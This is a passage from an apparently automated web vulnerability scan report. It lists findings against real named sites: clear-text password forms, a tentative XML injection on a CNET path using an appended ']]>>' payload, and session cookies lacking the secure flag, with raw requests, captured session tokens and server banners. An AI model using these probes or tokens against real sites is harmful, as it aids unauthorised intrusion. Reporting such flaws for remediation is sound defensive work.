6.5. http://lists.arin.net/mailman/listinfo/arin-whoisrws  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://lists.arin.net
Path:   /mailman/listinfo/arin-whoisrws

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /mailman/listinfo/arin-whoisrws HTTP/1.1
Host: lists.arin.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:02:59 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: text/html; charset=us-ascii
Content-Length: 12065

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<!-- $Revision: 2.4 $ -->
<!--
...[SNIP]...
<fieldset class="standard">
<FORM Method=POST ACTION="../subscribe/arin-whoisrws">

<h3 class="mail_h3">
...[SNIP]...
</label>
<INPUT type="Password" name="pw" size="15"></li>
...[SNIP]...
</label>
<INPUT type="Password" name="pw-conf" size="15"></li>
...[SNIP]...

6.6. http://whitepapers.theregister.co.uk/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://whitepapers.theregister.co.uk
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: whitepapers.theregister.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:07:34 GMT
Server: Apache/2.2.9 (Debian) mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 34233

<!DOCTYPE html>
<html lang=en>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Whitepapers and tech resources from The Register</title>
<link rel="stylesheet" href="/
...[SNIP]...
</div>


<form action="http://account.theregister.co.uk/login/" method="post" id="Login">
<input type=hidden name=r value="http://whitepapers.theregister.co.uk/">
...[SNIP]...
<td><input type="password" name="password" class="Text" tabindex="4"></td>
...[SNIP]...

6.7. http://whitepapers.theregister.co.uk/search/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://whitepapers.theregister.co.uk
Path:   /search/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /search/ HTTP/1.1
Host: whitepapers.theregister.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:07:35 GMT
Server: Apache/2.2.9 (Debian) mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 24426

<!DOCTYPE html>
<html lang=en>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Search for ...... ... Reg Whitepapers</title>
<link rel="stylesheet" href="/style_picke
...[SNIP]...
</div>


<form action="http://account.theregister.co.uk/login/" method="post" id="Login">
<input type=hidden name=r value="http://whitepapers.theregister.co.uk/search/">
...[SNIP]...
<td><input type="password" name="password" class="Text" tabindex="4"></td>
...[SNIP]...

6.8. http://www.43things.com/person/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.43things.com
Path:   /person/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /person/ HTTP/1.1
Host: www.43things.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 12 Jan 2011 13:08:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.4
X-Runtime: 0.01017
Cache-Control: no-cache
Set-Cookie: ubid=SV2zpKsaoTKvCsQCCVAPEBCrBaA%3D; domain=.43things.com; path=/; expires=Sat, 09 Jan 2021 13:08:00 GMT
Set-Cookie: auth=pnAiy5OTmH8VYlJnGjHyFoBpPvpc4DPnYbLKjnQeNv9Q7ss4zO9i2gGP8aKM5xF9EY9nas978c%2BQyCXn8qgOvWb28tIflxH1k8TKgw8KLZE%3D; domain=.43things.com; path=/; expires=Sat, 09 Jan 2021 13:08:00 GMT
Set-Cookie: rw=; domain=.43things.com; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _session_id=29d6c53e1159bfde1f23b713b0b5d77e; domain=.43things.com; path=/
Content-Length: 13962
Status: 404 Not Found
Cache-Control: max-age=1
Expires: Wed, 12 Jan 2011 13:08:01 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>43 Things</title>
<m
...[SNIP]...
</div>


<form name="existingAccount" action="/auth/login" method="post" onsubmit="new Ajax.Updater('overlay', '/auth/loginjs', {asynchronous:true, evalScripts:true, onLoading:function(request){ajax_status('loadingmsg','<img src=/images/icons/indicator.gif align=middle>', 'replace')}, parameters:Form.serialize(this)}); return false;">

<table class="login-form">
...[SNIP]...
<td align="left" style="background:url('http://acf.43things.com/images/nav/login_input_background.gif') no-repeat left top; width:299px;"><input class="login-input" id="person_password" name="person[password]" size="30" type="password" /></td>
...[SNIP]...

6.9. http://www.sentinelinvestments.com/advisor-login  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sentinelinvestments.com
Path:   /advisor-login

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /advisor-login HTTP/1.1
Host: www.sentinelinvestments.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=22150713.1294754867.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=qmis707mdaq9bcgqjvjtrnmke6; __utma=22150713.441323346.1294754867.1294754867.1294754867.1; __utmc=22150713; __utmb=22150713.4.10.1294754867;

Response

HTTP/1.1 200 OK
Date: Tue, 11 Jan 2011 16:03:18 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13007

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head>
   <l
...[SNIP]...
</DIV>

       <form method="post" action="/inc/form_scripts/advisor_login_script.php">
   
       <DIV ID="advisor_login_topleft_form_email">
...[SNIP]...
<DIV ID="advisor_login_topleft_form_password">Password:
<input name="password" id="password" type="password" value="" /></DIV>
...[SNIP]...

6.10. http://www.tukaiz.com/index.php  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tukaiz.com
Path:   /index.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /index.php HTTP/1.1
Host: www.tukaiz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: PHP/5.2.1
Set-Cookie: fc0fc83ec7006e5c547094008560a464=-; path=/
Date: Wed, 12 Jan 2011 05:01:35 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
</h3>
                   <form action="http://www.tukaiz.com/index.php" method="post" name="login" >
   
   <table width="100%" border="0" cellspacing="0" cellpadding="0" align="center">
...[SNIP]...
<br />
           <input type="password" id="mod_login_password" name="passwd" class="inputbox" size="10" alt="password" />
           <br />
...[SNIP]...

7. XML injection  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://download.cnet.com
Path:   /8300-2007_4-12.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Issue background

XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.

This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.

Issue remediation

The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: &lt; and &gt;.

Request

GET /8300-2007_4-12.html]]>> HTTP/1.1
Host: download.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw; MADTEST=1; rbSessionId=Cg5gU00qL2CtwdbzqSI; MADUCAT=1&0109&BK14860; mad_rsi_segs=; arrowLat=1294610272673; arrowSpc=1; tempSessionId=Cg5gnU0qL2CtwdbzfuE; arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html;

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:45:50 GMT
Via: HTTP/1.0 phx1-rb-frontend1-app6.cnet.com:8924 (cnwk.proxy.servlet.PathProxyServlet $Revision: 218012 $)
Content-Language: en
Expires: Wed, 12 Jan 2011 03:51:50 GMT
Edge-Control: max-age=360
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 04:15:50 GMT
Set-Cookie: arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 03:45:50 GMT
Set-Cookie: arrowLat=1294803950489; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 03:45:50 GMT
Set-Cookie: arrowSpc=1; domain=.cnet.com; path=/; expires=Fri, 11-Feb-2011 03:45:50 GMT
Set-Cookie: arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 04:45:50 GMT
Set-Cookie: arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 03:46:50 GMT
Set-Cookie: arrowBiChecked=true; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 03:45:55 GMT
Set-Cookie: arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 03:46:50 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: max-age=360
Keep-Alive: timeout=15, max=962
Connection: Keep-Alive
Content-Length: 105058

<!DOCTYPE html>


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Yoda loves you -->
<head>


<title>Software news, tips an
...[SNIP]...
<p>Click this link to view as XML.</p>
...[SNIP]...

8. SSL cookie without secure flag set  previous  next
There are 21 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


8.1. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Allure  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_Allure

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_Allure HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:44:43 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000G-h5yYIX_fsCdYaaomzo48b:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:53:23 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0YB%0aJl69zTeOdt0W%2fI1bQxUaXluBK4%2b4re%2bNGtxBIVjSxQMGJbwroUJ2uepbtFXi4W8%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16419596%3atrue%3afalse%3a0%3aqFLccT2YrlnZwn4eqF9jLONT7P4%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 29783


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

8.2. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_ArchitecturalDigest  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_ArchitecturalDigest

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_ArchitecturalDigest HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:44:38 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000xNqeoIoWgm7tfT4YP_0pvgw:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:53:29 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0YlZQawo6a%2fCa%0adt0Ca5sgwGLGZRYgwcw9yVBAEI4l4WP6D%2flSrQrYmWvnSq3PAt9DJMCltsf9lks%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16420003%3atrue%3afalse%3a0%3amAg2jXtkO5mMA5V5w%2f5pyYw%2fn1g%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 26827


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

8.3. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_BonAppetite  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_BonAppetite

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_BonAppetite HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:44:51 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000tbdA8jKr2XFeez646mYyAzj:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:53:41 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0bb%0agmx%2fBKjEubD1u2lDzKNrp%2fxq%2fEh3zocUN0K08ospwh0L1bcod31%2fGhJWskPe%2bvA%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16419605%3atrue%3afalse%3a0%3a6TUPgGq3ci7IPBw4tu5kSdECWw4%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 29951


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

8.4. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Brides  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_Brides

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_Brides HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:44:48 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=00004nur2b4AB8GyjoBhBXHJFNN:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:53:39 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0Za%0aN8I5U1fIm%2bVXFNkHZc7mzEyRNk9R93bc3Z%2bj3WRLr%2f%2fLUA4vR9PWa%2b%2fqrTv2%2bGU%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16419602%3atrue%3afalse%3a0%3aA5S73L%2bBXNF58pGv%2flPBhYu4lts%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 29610


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

8.5. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_CondeNastPortfolio  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_CondeNastPortfolio

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_CondeNastPortfolio HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:45:13 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000MTLmULOAO5VhhPygy4Acrs9:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:53:52 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 350


<!-- JSP File Name: Stores.war/GenericSystemError.jsp -->


       <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<HTML>
<head>
   <title>Generic System Error Test JSP (Item)
...[SNIP]...

8.6. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_CondeNastTraveler  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_CondeNastTraveler

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_CondeNastTraveler HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:45:14 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000DEGztK4KuU8jzcAvA-zQ_sb:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:53:54 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0YF%0a57LJD52VFrIOn1bSX%2fQv09%2bRP8hqpL9gI8glNNCvaGm3LmA3Rod42Mm2tHMtlbM%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16419613%3atrue%3afalse%3a0%3aRsNgMu8ZswVr2yV3hDnh86UdQV4%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 30231


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

8.7. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Details  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_Details

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_Details HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:45:07 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000zj5CriHITh3Pg1Mh5DZbRfE:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:53:59 GMT; Path=/
